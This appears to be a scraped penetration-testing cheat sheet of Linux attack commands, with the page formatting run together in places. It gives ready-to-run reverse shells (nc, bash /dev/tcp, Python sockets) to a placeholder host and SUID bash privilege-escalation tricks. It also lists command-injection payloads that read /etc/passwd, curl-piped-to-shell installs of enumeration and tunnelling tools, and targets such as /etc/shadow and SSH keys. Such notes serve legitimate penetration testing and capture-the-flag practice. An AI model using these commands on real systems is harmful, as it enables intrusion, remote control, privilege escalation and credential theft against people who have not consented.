- Command Injection
- Enumeration
- FTP
- Gdbserver
- Network
- Port Forwarding
- Privilege Escalation
- Reverse Shell
- SCP
- Sudo
sudo -lcurl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | shcurl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh
chmod +x lse.sh
./lse.sh -l1msfconsole -q -x 'use exploit; set RHOSTS ip; set RPORT port; run; exit'curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -O/etc/passwd&/etc/shadow/www/htmlꞏ/var/wwwꞏ/srv/htmlꞏ/usr/share/*/home/user/.ssh/etc/cron.d/opt//usr/local/bin/etc/nginx/sites-available/default/etc/apache2/sites-enabled/000-default.conf
/proc/ contains useful information about the processes that are currently running
| directory | description |
|---|---|
/proc/PID/cmdline |
Command line arguments. |
/proc/PID/cwd |
Link to the current working directory. |
/proc/PID/environ |
Values of environment variables. |
/proc/PID/exe |
Link to the executable of this process. |
/proc/PID/fd |
Directory, which contains all file descriptors. |
find / -user user 2>&-
find / -group group 2>&-
find / -user root -executable -type f 2>&- | grep -v /bin//sbin/getcap -r *nc -lp 4444# Client
resh ip 4444
# Server
resh 4444nc ip 4444 -e /bin/bashmkfifo /tmp/f;nc ip 4444 0</tmp/f|/bin/sh -i 2>&1|tee /tmp/fbash -c 'bash -i >& /dev/tcp/ip/4444 0>&1'"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'bash -ipython3 -c 'import pty; pty.spawn("/bin/bash")'script -qc /bin/bash /dev/nullrlwrap is a 'readline wrapper', a small utility that uses the GNU Readline library to allow the editing of keyboard input for any command. For when you cannot spawn a proper TTY source
rlwrap command# Receiving connection from a reverse shell
rlwrap nc -lnvp port
# Connecting to the victim
rlwrap nc ip port
# Add actual bash history and to put all words seen on in- and output on the completion list.
rlwrap nc -r -f . nc ip port/bin/cp /bin/bash /tmp/bash_up; /bin/chown user:group /tmp/bash_up; chmod g+s /tmp/bash_up; chmod u+s /tmp/bash_up
/tmp/bash_up -pchmod 4755 /bin/bash
bash -pPort: 21
File transfer protocol (FTP) is an Internet tool provided by TCP/IP. It helps to transfer files from one computer to another by providing access to directories or folders on remote computers
nmap --script ftp-* -p 21 ipwget -m --user=user --password=fpassword ftp://ipwget -m --user=anonymous --password=anonymous ftp://ipPort: 1337
Gdbserver is a computer program that makes it possible to remotely debug other programs. You need to have a copy of the program you want to debug put onto the target system.
$ gdb
(gdb) target extended-remote ip:port
(gdb) remote get remote_file local_file
(gdb) remote put local_file remote_file
;{cat,/etc/passwd}
;cat${IFS}/etc/passwd;
; cat /etc/passwd ;
$(cat /etc/passwd)
`cat /etc/passwd`
&& cat /etc/passwd &&
|| cat /etc/passwd ||
< <(cat /etc/passwd)
| cat /etc/passwd
"; cat /etc/passwd "GTFOBins - Bypass local security restrictions
netstat -tulpnfor port in {1..65535}; do echo > /dev/tcp/ip/$port && echo "$port open"; done 2>/dev/nullfor i in {1..254}; do (ping -c 1 192.168.1.${i} | grep "bytes from" | grep -v "Unreachable" &); done;# Install chisel
curl https://i.jpillora.com/chisel! | bash# Example: 8000 -> 4444
# Attacker machine:
chisel server -p 4444 --reverse
# Victim machine:
chisel client ip-server:4444 R:8000:127.0.0.1:8000ssh -L 8080:127.0.0.1:8080 user@ipscp -P port [email protected]:path .
scp -P port file [email protected]:path
scp -P 22 -r ~/.peda [email protected]:/tmp/peda